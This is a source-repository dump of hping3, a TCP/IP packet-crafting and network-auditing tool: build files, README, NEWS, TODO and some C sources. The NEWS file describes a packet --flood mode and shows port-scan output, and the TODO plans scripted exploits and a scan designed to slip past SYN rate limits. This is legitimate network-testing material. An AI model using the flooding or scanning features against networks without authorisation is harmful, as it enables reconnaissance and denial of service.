├── AUTHORS ├── BUGS ├── CHANGES ├── COPYING ├── INSTALL ├── KNOWN-BUGS ├── Makefile.in ├── NEWS ├── README ├── TODO ├── adbuf.c ├── adbuf.h ├── antigetopt.c ├── antigetopt.h ├── apd.c ├── apdutils.c ├── apdutils.h ├── ars.c ├── ars.h ├── arsglue.c ├── binding.c ├── byteorder.c ├── bytesex.h ├── cksum.c ├── configure ├── datafiller.c ├── datahandler.c ├── debian ├── README.source ├── changelog ├── compat ├── control ├── copyright ├── dirs ├── hping3.docs ├── hping3.examples ├── hping3.manpages ├── patches │ ├── 010_install.diff │ ├── 020_libpcap0.8.diff │ ├── 030_bytesex.diff │ ├── 040_spelling.diff │ ├── 050_personality.diff │ ├── 060_version.diff │ ├── 070_tcl.diff │ ├── 080_ip_id_field.diff │ ├── 090_fr_manpage.diff │ ├── 100_hyphen_used_as_minus_sign.diff │ ├── 110_dontfrag_offbyone.diff │ ├── 120_rtt_icmp_unreachable.diff │ ├── 130_spelling_error_in_binary.diff │ ├── 140_data_size_udp.diff │ ├── 150_gnu_kfreebsd.diff │ ├── 160_tcp_mss.diff │ └── series ├── rules └── watch ├── display_ipopt.c ├── docs ├── APD.txt ├── API.txt ├── AS-BACKDOOR ├── HPING2-HOWTO.txt ├── HPING2-IS-OPEN ├── HPING3.txt ├── MORE-FUN-WITH-IPID ├── SPOOFED_SCAN.txt ├── french │ ├── AS-BACKDOOR │ ├── HPING2-HOWTO.txt │ ├── HPING2-IS-OPEN │ ├── INSTALL │ ├── MORE-FUN-WITH-IPID │ ├── Makefile │ ├── NEWS │ ├── SPOOFED_SCAN.txt │ ├── hping2-fr.8 │ └── hping2-fr.8.txt ├── hping2.8 ├── hping2rc.example └── hping3.8 ├── fixtypes.h ├── gentables.c ├── gentables.sh ├── gethostname.c ├── getifname.c ├── getlhs.c ├── getusec.c ├── globals.h ├── hcmp.h ├── hex.c ├── hex.h ├── hping2.h ├── hstring.c ├── hstring.h ├── if_promisc.c ├── img ├── .xvpics │ ├── favicon.pnm │ └── hping_icon.jpg ├── favicon.ico ├── favicon.pnm ├── hping_big.jpg └── hping_icon.jpg ├── in.h ├── interface.c ├── interface.h ├── ip_opt_build.c ├── lib ├── README ├── apd.htcl ├── apd2.htcl ├── ciscoios.htcl ├── ciscoios0.htcl ├── cloner.htcl ├── hpingstdlib.htcl ├── igrp.htcl ├── isn-spectrogram.htcl ├── nat-noise.htcl ├── passivets.htcl ├── ping.htcl ├── raw.htcl ├── regtest │ └── rt0.htcl ├── show-tcpseq.htcl └── showled.htcl ├── libpcap_stuff.c ├── listen.c ├── logicmp.c ├── main.c ├── memlock.c ├── memlockall.c ├── memstr.c ├── memunlock.c ├── memunlockall.c ├── opensockraw.c ├── parseoptions.c ├── random.c ├── rapd.c ├── release.h ├── relid.c ├── resolve.c ├── rtt.c ├── sbignum-tables.c ├── sbignum-tables.h ├── sbignum.c ├── sbignum.h ├── scan.c ├── script.c ├── send.c ├── sendhcmp.c ├── sendicmp.c ├── sendip.c ├── sendip_handler.c ├── sendrawip.c ├── sendtcp.c ├── sendudp.c ├── signal.c ├── sockopt.c ├── split.c ├── statistics.c ├── strlcpy.c ├── usage.c ├── version.c └── waitpacket.c /AUTHORS: -------------------------------------------------------------------------------- 1 | Lead developer and maintainer: 2 | 3 | Salvatore Sanfilippo 4 | 5 | Regular contributors: 6 | 7 | Nicolas Jombart 8 | Denis Ducamp 9 | Yann Berthier 10 | Stephane Aubert 11 | 12 | Other contributors: 13 | 14 | Brieuc Jeunhomme 15 | Mika 16 | Alfonso De Gregorio 17 | Francesco Potorti` 18 | Daniel Ginsburg 19 | Steve Bleazard 20 | 21 | 22 | Also thanks to the following people for testing, bug reports, ideas, 23 | minor patches, documentation fixes: 24 | 25 | Valeriano Bedeschi 26 | Lorenzo Cavallaro 27 | awgn roofing 28 | Darren Reed 29 | Lance Spitzner 30 | Stefano Brandimarte 31 | "roy kozzer" 32 | Jason Lunz 33 | Domenico Andreoli 34 | Gian-Luca Dei Rossi 35 | Marco D'Itri 36 | Rui Miguel Barbosa Machado 37 | David Bar 38 | David Coppa 39 | Shachar Shemesh 40 | Brieuc Jeunhomme 41 | Hans-Joachim Knobloch 42 | Olivier Warin 43 | 44 | -------------------------------------------------------------------------------- 45 | Note: if you aren't in this list for an oversight, please inform me. 46 | -------------------------------------------------------------------------------- /BUGS: -------------------------------------------------------------------------------- 1 | ------------------------------------------------ 2 | Please, use this procedure to report hping3 bugs 3 | ------------------------------------------------ 4 | 5 | - If you are able to use a Wiki: 6 | 7 | Go to http://wiki.hping.org/20 and use the 'edit' button to 8 | add your bug report. 9 | 10 | - If you can't use the Wiki: 11 | 12 | Follow the istructions at wiki.hping.org/20 but instead to add 13 | the bug report in the hping web site, write me an email. 14 | -------------------------------------------------------------------------------- /CHANGES: -------------------------------------------------------------------------------- 1 | CHANGES LOG 2 | $Id: CHANGES,v 1.2 2004/03/29 23:12:04 antirez Exp $ 3 | 4 | 30Mar2004 - First public release of hping3 5 | 21Jun2004 - Added --beep and --flood command line options. 6 | 22Jun2004 - hping3-alpha-2 released 7 | -------------------------------------------------------------------------------- /INSTALL: -------------------------------------------------------------------------------- 1 | You can compile hping3 at least under: 2 | 3 | Linux 4 | OpenBSD 5 | FreeBSD 6 | NetBSD 7 | Solaris 8 | 9 | But hping3 is beta, for now it was mostly tested only in Linux, 10 | this should change soon now that the first beta is out. 11 | 12 | Note that starting from hping3 libpcap should be used 13 | with all the kind of systems, including Linux. 14 | 15 | Linux 16 | ----- 17 | 18 | please, follows this steps: 19 | 20 | $ ./configure (first try ./configure --help) 21 | $ vi Makefile (optional) 22 | $ make 23 | $ su 24 | # make install 25 | 26 | FreeBSD, OpenBSD, NetBSD 27 | ------------------------ 28 | 29 | You will need the libpcap and the gmake utility installed on your system. 30 | 31 | $ ./configure 32 | $ gmake 33 | $ su (or calife) 34 | # gmake install 35 | 36 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 37 | NOTE: You should take care about your net/bpf.h file installing on 38 | BSD systems (specially with OpenBSD). If your original bpf.h was 39 | overwritten with the libpcap one probably hping will not work 40 | with over some interface. 41 | 42 | For example if you use the libpcap bpf.h on OpenBSD hping will 43 | not work over PPP interfaces. 44 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 45 | 46 | Solaris 47 | ------- 48 | 49 | $ export CC="gcc" 50 | $ ./configure 51 | $ gmake 52 | $ su 53 | # gmake install 54 | 55 | ALL 56 | --- 57 | 58 | To setuid hping3 is like to open the port to script kiddies 59 | for now. Don't do it in any real multiuser and otherwise 60 | security-sensitive system. 61 | 62 | antirez 63 | -------------------------------------------------------------------------------- /KNOWN-BUGS: -------------------------------------------------------------------------------- 1 | See the BUGS manual section. 2 | -------------------------------------------------------------------------------- /Makefile.in: -------------------------------------------------------------------------------- 1 | # $smu-mark$ 2 | # $name: Makefile.in$ 3 | # $author: Salvatore Sanfilippo 'antirez'$ 4 | # $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 5 | # $license: This software is under GPL version 2 of license$ 6 | # $date: Sun Jul 25 17:56:15 MET DST 1999$ 7 | # $rev: 3$ 8 | 9 | CC= gcc 10 | AR=/usr/bin/ar 11 | RANLIB=/usr/bin/ranlib 12 | CCOPT= -O2 -Wall @PCAP_INCLUDE@ @TCL_INC@ @USE_TCL@ 13 | DEBUG= -g 14 | #uncomment the following if you need libpcap based build under linux 15 | #(not raccomanded) 16 | COMPILE_TIME= 17 | INSTALL_MANPATH=@MANPATH@ 18 | @PCAP@ 19 | 20 | ARSOBJ = ars.o apd.o split.o rapd.o 21 | 22 | OBJ= main.o getifname.o getlhs.o \ 23 | parseoptions.o datafiller.o \ 24 | datahandler.o gethostname.o \ 25 | binding.o getusec.o opensockraw.o \ 26 | logicmp.o waitpacket.o resolve.o \ 27 | sendip.o sendicmp.o sendudp.o \ 28 | sendtcp.o cksum.o statistics.o \ 29 | usage.o version.o antigetopt.o \ 30 | sockopt.o listen.o \ 31 | sendhcmp.o memstr.o rtt.o \ 32 | relid.o sendip_handler.o \ 33 | libpcap_stuff.o memlockall.o memunlockall.o \ 34 | memlock.o memunlock.o ip_opt_build.o \ 35 | display_ipopt.o sendrawip.o signal.o send.o \ 36 | strlcpy.o arsglue.o random.o scan.o \ 37 | hstring.o script.o interface.o \ 38 | adbuf.o hex.o apdutils.o sbignum.o \ 39 | sbignum-tables.o $(ARSOBJ) 40 | 41 | all: .depend hping3 42 | 43 | dep: .depend 44 | .depend: 45 | @echo Making dependences 46 | @$(CC) -MM *.c > .depend 47 | 48 | libars.a: $(ARSOBJ) 49 | $(AR) rc $@ $^ 50 | $(RANLIB) $@ 51 | 52 | hping3: byteorder.h $(OBJ) 53 | $(CC) -o hping3 $(CCOPT) $(DEBUG) $(OBJ) -L/usr/local/lib $(PCAP) @SOLARISLIB@ @TCL_LIB@ 54 | @echo 55 | ./hping3 -v 56 | @echo "use \`make strip' to strip hping3 binary" 57 | @echo "use \`make install' to install hping3" 58 | 59 | hping3-static: byteorder.h $(OBJ) 60 | $(CC) -static -o hping3-static $(CCOPT) $(DEBUG) $(OBJ) -L/usr/local/lib $(PCAP) @SOLARISLIB@ @TCL_LIB@ -ldl 61 | 62 | byteorder.h: 63 | ./configure 64 | 65 | .c.o: 66 | $(CC) -c $(CCOPT) $(DEBUG) $(COMPILE_TIME) $< 67 | 68 | clean: 69 | rm -rf hping3 *.o libars.a 70 | 71 | distclean: 72 | rm -rf hping3 *.o byteorder byteorder.h systype.h Makefile libars.a .depend 73 | 74 | install: hping3 75 | cp -f hping3 /usr/sbin/ 76 | chmod 755 /usr/sbin/hping3 77 | ln -s /usr/sbin/hping3 /usr/sbin/hping 78 | ln -s /usr/sbin/hping3 /usr/sbin/hping2 79 | @if [ -d ${INSTALL_MANPATH}/man8 ]; then \ 80 | cp ./docs/hping3.8 ${INSTALL_MANPATH}/man8; \ 81 | chmod 644 ${INSTALL_MANPATH}/man8/hping3.8; \ 82 | else \ 83 | echo "@@@@@@ WARNING @@@@@@"; \ 84 | echo "Can't install the man page: ${INSTALL_MANPATH}/man8 does not exist"; \ 85 | fi 86 | 87 | strip: hping3 88 | @ls -l ./hping3 89 | strip hping3 90 | @ls -l ./hping3 91 | 92 | include .depend 93 | -------------------------------------------------------------------------------- /NEWS: -------------------------------------------------------------------------------- 1 | Read the README file to know about the new features in general. 2 | 3 | ------ hping3 alpha2 ------- 4 | 5 | Two new features for the command line interface. 6 | 7 | 1) Using the --beep option hping will produce a beep for every matching 8 | packet received (not for ICMP errors). 9 | 10 | 2) The --flood option to send packets as fast as possible. This 11 | is much faster than "-i u1", because it's actually an endless 12 | loop and in this mode hping will not care to read/show replies 13 | at all. 14 | 15 | ------ hping3 alpha1 ------- 16 | 17 | Read the docs/API.txt for information about scripting capabilties. 18 | 19 | Check the libs directory for examples of hping scripts. 20 | 21 | Try the --scan option in the command line to see the port-scanner features. 22 | 23 | Example of the --scan option usage: 24 | 25 | # hping3 --scan known 1.2.3.4 -S 26 | 27 | Scanning 1.2.3.4 (1.2.3.4), port known 28 | 245 ports to scan, use -V to see all the replies 29 | +----+-----------+---------+---+-----+-----+-----+ 30 | |port| serv name | flags |ttl| id | win | len | 31 | +----+-----------+---------+---+-----+-----+-----+ 32 | 9 discard : .S..A... 64 0 32767 44 33 | 13 daytime : .S..A... 64 0 32767 44 34 | 21 ftp : .S..A... 64 0 32767 44 35 | 22 ssh : .S..A... 64 0 32767 44 36 | 25 smtp : .S..A... 64 0 32767 44 37 | 37 time : .S..A... 64 0 32767 44 38 | 80 www : .S..A... 64 0 32767 44 39 | 111 sunrpc : .S..A... 64 0 32767 44 40 | 113 auth : .S..A... 64 0 32767 44 41 | 631 ipp : .S..A... 64 0 32767 44 42 | 3306 mysql : .S..A... 64 0 32767 44 43 | 6000 x11 : .S..A... 64 0 32767 44 44 | 6667 ircd : .S..A... 64 0 3072 44 45 | All replies received. Done. 46 | Not responding ports: 47 | -------------------------------------------------------------------------------- /README: -------------------------------------------------------------------------------- 1 | hping3 README file 2 | antirez@invece.org 3 | 4 | DESCRIPTION 5 | 6 | hping3 is a network tool able to send custom TCP/IP 7 | packets and to display target replies like ping do with 8 | ICMP replies. hping3 can handle fragmentation, and 9 | almost arbitrary packet size and content, using the 10 | command line interface. 11 | 12 | Since version 3, hping implements scripting capabilties, 13 | read the API.txt file under the /docs directory to know 14 | more about it. 15 | 16 | As a command line utility, hping is useful to test at 17 | many kind of networking devices like firewalls, routers, 18 | and so. It can be used as a traceroute alike program over all 19 | the supported protocols, firewalk usage, OS fingerprinting, 20 | port-scanner (see the --scan option introduced with hping3), 21 | TCP/IP stack auditing. 22 | 23 | It's also really a good didactic tool to learn TCP/IP. 24 | 25 | Using Tcl/Tk scripting much more can be done, because 26 | while the hping3 packet generation code is actually the 27 | hping2 put there mainly for compatibility with the command 28 | line interface, all the real news are about scripting. 29 | 30 | See the libs directory for example scripts. To run 31 | the example scripts type: 32 | 33 | hping3 exec ScriptName.htcl 34 | 35 | hping3 is developed and manteined by antirez@invece.org 36 | with the help of other hackers, and comes under GPL version 37 | 2 of license. Development is open so you can send me 38 | patches/suggestions/affronts without inhibitions. 39 | 40 | Please check the AUTHORS file for a list of people that 41 | contribued with code, ideas, bug reports. 42 | 43 | Also vim developer, ee.lbl.gov for tcpdump and GNU in general. 44 | 45 | DOCUMENTATION 46 | 47 | For the hping3 API check docs/API.txt 48 | 49 | You can find documentation about hping3 specific functions 50 | at http://wiki.hping.org 51 | 52 | Make sure to check the page at http://wiki.hping.org/34 53 | 54 | DOWNLOAD 55 | 56 | The hping3 primary download site is the following: 57 | 58 | http://www.hping.org 59 | 60 | ---------------------------------------------------------------- 61 | How to get the hping3 source code from the anonymous CVS server 62 | ---------------------------------------------------------------- 63 | 64 | $ cvs -d :pserver:anonymous@cvs.hping2.sourceforge.net:/cvsroot/hping2 login 65 | 66 | CVS will ask for the password, just press enter, no password is required 67 | 68 | than type the following to download the full source code. 69 | 70 | $ cvs -z8 -d :pserver:anonymous@cvs.hping2.sourceforge.net:/cvsroot/hping2 checkout hping3s 71 | 72 | ----------------------------------- 73 | How to update your source code tree 74 | ----------------------------------- 75 | 76 | change the current directory to /somewhere/hping2, than just type: 77 | 78 | $ cvs update 79 | 80 | REQUIREMENTS 81 | 82 | A supported unix-like OS, gcc, root access. 83 | 84 | Libpcap. 85 | 86 | Tcl/Tk is optional but strongly suggested. 87 | 88 | INSTALLATION 89 | 90 | see INSTALL file. 91 | 92 | have fun, 93 | antirez 94 | -------------------------------------------------------------------------------- /TODO: -------------------------------------------------------------------------------- 1 | WARNING: Also try `grep FIXME *.c' 2 | 3 | HPING3 TODO. 4 | 5 | HPING2 bugs will no longer be handled, the hping2 code inside hping3 6 | is just a compatibility layer that will be dropped once the command 7 | line interface will be reimplemented as an hping script itself. 8 | 9 | DONE - split/rapd for IGRP (me) 10 | DONE - add more flags and broadcast address to 'hping iflist'. (me) 11 | DONE - ARS's apd and rapd support for IP and TCP options (me) 12 | 13 | - TUN/TAP support -- virtual interface creation, with Tcl channels 14 | - in 'hping recv' a timeout of zero or -1 should be specified using 15 | keyword like 'dontblock' and 'forever', like a number of packets 16 | equal to zero should be specified using the 'all' keyword. 17 | - compression primitives 'hping zip', 'hping unzip'. 18 | - recv should support -nobadsum and -notrunc to don't receive packets 19 | containing layers with the bad checksum or truncated flags set. 20 | - 'hping recvraw' should support a -split option to return the raw data 21 | splitted in layers in a flat TCL list where elements are: 22 | {layer0name binary0 layer1name binary1 ...} 23 | - Ability to specify the outgoing interface regardless of the 24 | destination IP address. (Should be impossible without datalink access) 25 | - 'hping setif ?-promisc? ?-broadcast? ifname' 26 | - 'hping build ?-nocompile? packet' APD->binary 27 | - 'hping describe packet' binary->APD 28 | - IPv6 support in ARS (some still-non-working patch received) 29 | - The hping standard library. that's the real development area 30 | to make the scripting capabilities useful. The library should 31 | contain a reasonable number of functions to make it more handy, 32 | and a number of standard exploits should be rewritten in hping 33 | as examples. Also support for fragmentation, TCP reassembly, 34 | and so on will be useful. 35 | - A short way to invoke scripts in 'path' (/usr/local/lib/hping/*.htcl), 36 | something like: "hping script.htcl". Hping may sense it's an .htlc 37 | file and not a strange-locking domain name ;) and perform a lookup 38 | in the standard library of scripts (~/.hping/*.htcl for example). 39 | - Convert all the raw-socket stuff (used in output) to datalink. 40 | - Implement a scanner, with random nmap and hping features, and also: 41 | FIN scan follwed by a SYN scan, this can be useful 42 | since many admins limit the incoming SYN packets, so the 43 | SYN or connect() scan is too slow, while the FIN scan 44 | show filtered ports as open. We can do a FIN scan, then scan 45 | the ports that appears to be open with SYN. Should 46 | be both fast and accurate. 47 | 48 | TODO (about TCL scripting, but for future releases) 49 | 50 | - 'hping iflist' should include the link header length (or -1 if it's unknown) 51 | - 'hping recv' and 'recvraw' should have a -layer2 option to return the whole 52 | level 2 frame. The same for 'hping send' and 'hping sendraw'. 53 | - 'hping guesslhs' should run the ipv4 header detection and return the lhs 54 | -------------------------------------------------------------------------------- /adbuf.h: -------------------------------------------------------------------------------- 1 | /* adbuf.h - header file for adbuf.c 2 | * 3 | * Copyright(C) 2001-2002 Salvatore Sanfilippo 4 | * All rights reserved. 5 | * See the LICENSE file for COPYRIGHT and PERMISSION notice */ 6 | 7 | /* $Id: adbuf.h,v 1.1.1.1 2003/08/31 17:24:00 antirez Exp $ */ 8 | 9 | #ifndef _ADBUF_H 10 | #define _ADBUF_H 11 | 12 | #include 13 | 14 | struct adbuf { 15 | char *buf; 16 | size_t size; /* total buffer size */ 17 | size_t left; /* unused buffer size */ 18 | /* the size of data stored is just size-left */ 19 | }; 20 | 21 | #define ADBUF_INCR 256 /* note that this MUST BE >= 1 */ 22 | #define adbuf_used(b) ((b)->size - (b)->left) 23 | #define adbuf_ptr(b) ((b)->buf) 24 | 25 | /* Rawly create an adbuf object. 's' is supposed to be some heap 26 | * memory already allocated, with some nul-term string inside */ 27 | #define adbuf_from_heapstring(b,s) \ 28 | do { b->buf = s; b->left = 0; b->size = strlen(s); } while(0) 29 | 30 | int adbuf_init(struct adbuf *b); 31 | void adbuf_free(struct adbuf *b); 32 | int adbuf_reset(struct adbuf *b); 33 | int adbuf_add(struct adbuf *b, void *data, size_t len); 34 | int adbuf_addchar(struct adbuf *b, int c); 35 | int adbuf_strcat(struct adbuf *b, char *string); 36 | int adbuf_cat(struct adbuf *a, struct adbuf *b); 37 | int adbuf_cut(struct adbuf *b, size_t count); 38 | int adbuf_ltrim(struct adbuf *b, size_t count); 39 | int adbuf_rtrim(struct adbuf *b, size_t count); 40 | int adbuf_add_long(struct adbuf *b, long l); 41 | int adbuf_add_ulong(struct adbuf *b, unsigned long l); 42 | int adbuf_clone(struct adbuf *src, struct adbuf *dst); 43 | int adbuf_printf(struct adbuf *dst, const char *fmt, ...); 44 | 45 | #endif /* _ADBUF_H */ 46 | -------------------------------------------------------------------------------- /antigetopt.c: -------------------------------------------------------------------------------- 1 | /* antigetopt -- a getopt replacement 2 | * Copyright(C) 2001 Salvatore Sanfilippo 3 | * This software is released under the GPL license 4 | * see the COPYING file for more information */ 5 | 6 | /* $Id: antigetopt.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 7 | 8 | /* TODO: 9 | * argument list sanity check */ 10 | 11 | #include 12 | #include 13 | #include 14 | 15 | #include "antigetopt.h" 16 | 17 | /* global vars */ 18 | char *ago_optarg = NULL; 19 | char *ago_optname = NULL; 20 | char ago_optchar = '\0'; 21 | 22 | /* static vars */ 23 | static struct ago_exception { 24 | int (*tester)(void); 25 | char *msg; 26 | } ago_exceptions[3] = { 27 | { NULL, NULL }, 28 | { NULL, NULL }, 29 | { NULL, NULL } 30 | }; 31 | 32 | static int ago_exception_bits[] = { AGO_EXCEPT0, AGO_EXCEPT1, AGO_EXCEPT2 }; 33 | 34 | /* static functions */ 35 | static struct ago_optlist 36 | *ago_lookup(struct ago_optlist *list, char *arg, int *islong, int *amb); 37 | static int strinitcmp(char *a, char *b); 38 | 39 | /*----------------------------- implementation ------------------------------ */ 40 | 41 | int antigetopt(int argc, char **argv, struct ago_optlist *list) 42 | { 43 | static char **save_argv = NULL; 44 | static char *chain = NULL; 45 | static int endoptions = 0; 46 | struct ago_optlist *opt; 47 | int islong; 48 | 49 | /* Reset */ 50 | if (argv == NULL) { 51 | save_argv = NULL; 52 | chain = NULL; 53 | endoptions = 0; 54 | return AGO_RESET; 55 | } else { 56 | if (save_argv == NULL) { 57 | save_argv = argv+1; /* skips the argv[0] */ 58 | /* XXX: argument list sanity check */ 59 | } 60 | } 61 | 62 | chain_start: 63 | if (chain) { 64 | if (*chain == '\0') 65 | chain = NULL; 66 | else { 67 | if ((opt = ago_lookup(list, chain, &islong, NULL)) 68 | == NULL) 69 | return AGO_UNKNOWN; 70 | if (!(opt->ao_flags & AGO_NOARG)) { 71 | /* the if expression maybe false if the 72 | * argument is optional */ 73 | if (chain[1] == '\0' && *save_argv) 74 | ago_optarg = *save_argv++; 75 | /* while it is mandatory for the NEEDARG type */ 76 | else if (opt->ao_flags & AGO_NEEDARG) 77 | return AGO_REQARG; 78 | } 79 | chain++; 80 | return opt->ao_id; 81 | } 82 | } 83 | 84 | argv = save_argv; 85 | 86 | /* handle the "--" special option */ 87 | if (*argv && strcmp(*argv, "--") == 0) { 88 | endoptions = 1; 89 | argv++; 90 | save_argv++; 91 | } 92 | 93 | while(*argv) { 94 | /* The option must start with '-' */ 95 | if (!endoptions && argv[0][0] == '-' && argv[0][1] != '\0') { 96 | int amb; 97 | 98 | /* note: ago_lookup also sets ago_optname */ 99 | if ((opt = ago_lookup(list, argv[0], &islong, &amb)) 100 | == NULL) 101 | return amb ? AGO_AMBIG : AGO_UNKNOWN; 102 | 103 | /* handle the collapsed short options */ 104 | if (!islong && argv[0][2] != '\0') { 105 | chain = argv[0]+1; 106 | save_argv++; 107 | goto chain_start; 108 | } 109 | 110 | /* if the option require or may have an argument */ 111 | ago_optarg = NULL; 112 | /* If the argument is needed we get the next argv[] 113 | * element without care about what it contains */ 114 | if (opt->ao_flags & AGO_NEEDARG) { 115 | if (argv[1] == NULL) 116 | return AGO_REQARG; 117 | ago_optarg = argv[1]; 118 | argv++; 119 | } 120 | /* If the argument is optional we only recognize it 121 | * as argument if it does not starts with '-' */ 122 | else if (opt->ao_flags & AGO_OPTARG) { 123 | if (argv[1] && argv[1][0] != '-') { 124 | ago_optarg = argv[1]; 125 | argv++; 126 | } 127 | } 128 | save_argv = argv+1; 129 | return opt->ao_id; 130 | } else { 131 | save_argv = argv+1; 132 | ago_optarg = argv[0]; 133 | ago_optchar = '\0'; 134 | ago_optname = NULL; 135 | return AGO_ALONE; 136 | } 137 | } 138 | return AGO_EOF; 139 | } 140 | 141 | #define UNK_SHORT_ERRSTRING "invalid option -- %c\n" 142 | #define UNK_LONG_ERRSTRING "unrecognized option `--%s'\n" 143 | #define ARG_SHORT_ERRSTRING "option requires an argument -- %c\n" 144 | #define ARG_LONG_ERRSTRING "option `--%s' requires an argument\n" 145 | #define AMB_ERRSTRING "option `--%s' is ambiguos\n" 146 | #define IERR_ERRSTRING "internal error. ago_gnu_error() called with " \ 147 | "a bad error code (%d)\n" 148 | void ago_gnu_error(char *pname, int error) 149 | { 150 | if (pname) 151 | fprintf(stderr, "%s: ", pname); 152 | switch(error) { 153 | case AGO_UNKNOWN: 154 | if (ago_optname) 155 | fprintf(stderr, UNK_LONG_ERRSTRING, 156 | ago_optname); 157 | else 158 | fprintf(stderr, UNK_SHORT_ERRSTRING, 159 | ago_optchar); 160 | break; 161 | case AGO_REQARG: 162 | if (ago_optname) 163 | fprintf(stderr, ARG_LONG_ERRSTRING, 164 | ago_optname); 165 | else 166 | fprintf(stderr, ARG_SHORT_ERRSTRING, 167 | ago_optchar); 168 | break; 169 | case AGO_AMBIG: 170 | fprintf(stderr, AMB_ERRSTRING, ago_optname); 171 | break; 172 | default: 173 | fprintf(stderr, IERR_ERRSTRING, error); 174 | break; 175 | } 176 | } 177 | 178 | int ago_set_exception(int except_nr, int (*tester)(void), char *msg) 179 | { 180 | if (tester == NULL || msg == NULL || except_nr < 0 || except_nr >= 3) 181 | return -1; 182 | ago_exceptions[except_nr].tester = tester; 183 | ago_exceptions[except_nr].msg = msg; 184 | return 0; 185 | } 186 | 187 | /*-------------------------- static functions ------------------------------- */ 188 | 189 | struct ago_optlist 190 | *ago_lookup(struct ago_optlist *list, char *arg, int *islong, int *amb) 191 | { 192 | int i; 193 | 194 | /* ago_lookup can be receive as `arg' a pointer to a 195 | * long argument, like --option, a pointer to a short 196 | * argument like -O, or just a pointer to a char sequence 197 | * in the case of collapsed short arguments like -abcde. */ 198 | 199 | /* Clear the 'ambiguos' flag, used to report the caller 200 | * an ambiguos option abbreviation error */ 201 | if (amb) *amb = 0; 202 | 203 | if (*arg == '-') /* skips the first - if any */ 204 | arg++; 205 | 206 | switch(*arg) { 207 | case '\0': 208 | return NULL; 209 | case '-': 210 | *islong = 1; 211 | arg++; /* skip the last - */ 212 | break; 213 | default: 214 | *islong = 0; 215 | break; 216 | } 217 | 218 | /* search the argument in the list */ 219 | if (*islong) { 220 | int retval; 221 | struct ago_optlist *last = NULL; 222 | 223 | while(!(list->ao_flags & AGO_ENDOFLIST)) { 224 | ago_optname = arg; 225 | ago_optchar = '\0'; 226 | if ((retval = strinitcmp(arg, list->ao_long)) != 0) { 227 | switch(retval) { 228 | case 1: 229 | if (last) { 230 | if (amb) *amb = 1; 231 | return NULL; 232 | } 233 | last = list; 234 | break; 235 | case 2: 236 | goto ok; 237 | } 238 | } 239 | list++; 240 | } 241 | if (last) { 242 | ago_optname = last->ao_long; 243 | list = last; 244 | goto ok; 245 | } 246 | } else { 247 | ago_optchar = *arg; 248 | ago_optname = NULL; 249 | while(!(list->ao_flags & AGO_ENDOFLIST)) { 250 | if (*arg == list->ao_short) 251 | goto ok; 252 | list++; 253 | } 254 | } 255 | return NULL; 256 | ok: 257 | /* handle the exceptions if any */ 258 | for (i = 0; i < 3; i++) { 259 | if ((list->ao_flags & ago_exception_bits[i]) && 260 | ago_exceptions[i].tester) 261 | { 262 | if (ago_exceptions[i].tester()) { 263 | if (ago_optname) { 264 | fprintf(stderr, "%s `--%s'\n", 265 | ago_exceptions[i].msg, 266 | ago_optname); 267 | } else { 268 | fprintf(stderr, "%s `-%c'\n", 269 | ago_exceptions[i].msg, 270 | ago_optchar); 271 | } 272 | exit(1); 273 | } 274 | } 275 | } 276 | return list; 277 | } 278 | 279 | /* Given two strings this function returns: 280 | * 1, if the strings are the same for the len of the first string (abc, abcde) 281 | * 2, if the strings are exactly the same: (abcd, abcd) 282 | * otherwise zero is returned (abcde, abcd) ... (djf, 293492) */ 283 | int strinitcmp(char *a, char *b) 284 | { 285 | if (!a || !b) 286 | return 0; 287 | while (*a && *b) { 288 | if (*a != *b) 289 | return 0; 290 | a++; b++; 291 | } 292 | if (*a) 293 | return 0; 294 | if (*a == *b) 295 | return 2; 296 | return 1; 297 | } 298 | -------------------------------------------------------------------------------- /antigetopt.h: -------------------------------------------------------------------------------- 1 | #ifndef __ANTIGETOPT_H 2 | #define __ANTIGETOPT_H 3 | 4 | /* special return codes */ 5 | enum { AGO_EOF=4000, AGO_ALONE, AGO_UNKNOWN, AGO_REQARG, AGO_RESET, AGO_AMBIG }; 6 | 7 | /* option flags */ 8 | #define AGO_NOARG (1<<0) /* no argument */ 9 | #define AGO_NEEDARG (1<<1) /* required argument */ 10 | #define AGO_OPTARG (1<<2) /* optional argument */ 11 | #define AGO_EXCEPT0 (1<<3) /* exception #0 */ 12 | #define AGO_EXCEPT1 (1<<4) /* exception #1 */ 13 | #define AGO_EXCEPT2 (1<<5) /* exception #3 */ 14 | #define AGO_ENDOFLIST (1<<15) /* end of argument list marker */ 15 | 16 | /* option list null term */ 17 | #define AGO_LIST_TERM {'\0',NULL,0,AGO_ENDOFLIST} 18 | 19 | /* The structure that defines an argument */ 20 | struct ago_optlist { 21 | char ao_short; 22 | char *ao_long; 23 | int ao_id; 24 | int ao_flags; 25 | }; 26 | 27 | extern char *ago_optarg; 28 | extern char *ago_optname; 29 | extern char ago_optchar; 30 | 31 | int antigetopt(int argc, char **argv, struct ago_optlist *list); 32 | void ago_gnu_error(char *pname, int error); 33 | int ago_set_exception(int except_nr, int (*tester)(void), char *msg); 34 | 35 | #endif /* __ANTIGETOPT_H */ 36 | -------------------------------------------------------------------------------- /apdutils.c: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2003 Salvatore Sanfilippo 2 | * $Id: apdutils.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ 3 | */ 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | /* This function returns the indexes to seek a given field 10 | * of a given layer in an APD packet rappresentation. 11 | * The function is quite fast compared to a pure-Tcl regexp 12 | * based approach, sorry if it is quite ugly. 13 | * 14 | * field_start, value_start and value_end are set by reference, 15 | * the following graph shows where this three indexes point, 16 | * assuming the function is called with layer="ip" and field="tos": 17 | * 18 | * ip(ihl=5,ver=4,tos=0x10,...)+udp(...) 19 | * ^ ^ ^ 20 | * | | |____ field_start 21 | * | |_______ value_start 22 | * |___________ value_end 23 | * 24 | * The function returns 0 if layer/field don't match with 25 | * the packet, otherwise 1 is returned. If a given index pointer 26 | * is NULL, it is just not used. */ 27 | int ars_d_firstfield_off(char *packet, char *layer, char *field, 28 | int *field_start, int *value_start, int *value_end) 29 | { 30 | int layerlen = strlen(layer); 31 | int fieldlen = strlen(field); 32 | int 